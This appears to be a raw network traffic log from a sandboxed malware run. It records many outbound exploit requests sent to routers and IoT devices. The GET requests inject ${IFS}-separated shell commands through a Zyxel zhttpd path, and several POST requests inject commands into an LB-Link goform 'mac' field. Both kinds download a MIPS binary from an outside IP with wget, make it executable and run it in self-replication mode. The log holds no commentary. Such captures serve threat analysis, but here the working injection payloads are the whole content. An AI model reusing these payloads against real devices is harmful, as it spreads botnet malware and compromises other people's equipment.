                                        Jan 14, 2024 16:18:50.600094080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5970192.168.2.1336026187.93.39.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600131035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5971192.168.2.135484825.89.237.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600164890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5972192.168.2.1345946210.214.247.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600198030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5973192.168.2.135592096.205.234.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600249052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5974192.168.2.1360574126.154.183.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600291967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5975192.168.2.133653236.126.16.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600325108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5976192.168.2.1339526115.235.255.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600366116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5977192.168.2.133723087.122.164.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600418091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5978192.168.2.1348572210.188.219.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600456953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5979192.168.2.1342978175.25.192.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600506067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5980192.168.2.1332780107.178.10.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600543976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5981192.168.2.1336094173.177.200.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600589991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5982192.168.2.1341254213.137.35.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600636005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5983192.168.2.135993871.53.24.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600667000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5984192.168.2.1348866221.119.205.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600737095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5985192.168.2.1347682223.165.28.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600779057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5986192.168.2.1345484192.93.173.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600811005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5987192.168.2.1353360122.103.6.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600847960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5988192.168.2.1347528216.186.113.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600938082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5989192.168.2.1335432159.7.114.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.600970984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5990192.168.2.1337364126.216.85.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601001978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5991192.168.2.1341110107.138.84.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601042032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5992192.168.2.1336378222.87.192.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601075888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5993192.168.2.135008480.160.95.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601111889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5994192.168.2.1355872195.169.150.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601133108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5995192.168.2.1357068116.7.115.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601193905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5996192.168.2.135717087.72.23.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601228952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5997192.168.2.1346938199.212.102.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601298094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5998192.168.2.134698246.248.51.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601322889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5999192.168.2.1355462122.78.100.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601361036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6000192.168.2.1339810118.154.174.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601396084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6001192.168.2.1343678146.132.226.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601419926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6002192.168.2.1343214179.163.211.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601449966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6003192.168.2.135363476.173.173.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601496935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6004192.168.2.1347224197.5.171.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601546049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6005192.168.2.133681043.147.250.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601573944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6006192.168.2.134299036.217.234.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.601604939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6007192.168.2.1348192212.68.199.2548080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.452892065 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:51.648469925 CET525INHTTP/1.1 400 Bad Request
                                        Content-Type: text/html; charset=us-ascii
                                        Server: Microsoft-HTTPAPI/2.0
                                        Date: Sun, 14 Jan 2024 15:18:51 GMT
                                        Connection: close
                                        Content-Length: 334
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6008192.168.2.1356782192.186.29.898080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.566603899 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:55.696913004 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:19:01.840939999 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6009192.168.2.1346386121.86.107.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.608783007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6010192.168.2.1355178115.127.82.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.608869076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6011192.168.2.1341246170.130.92.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.608901978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6012192.168.2.1339342211.31.198.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.608964920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6013192.168.2.1343380174.6.108.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609014034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6014192.168.2.133391249.86.188.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609071016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6015192.168.2.1340268109.94.0.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609112024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6016192.168.2.1359784149.53.11.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609144926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6017192.168.2.134066486.86.114.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609184027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6018192.168.2.134373625.203.79.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.609189987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6019192.168.2.134542474.222.41.5443
                                        TimestampBytes transferredDirectionData
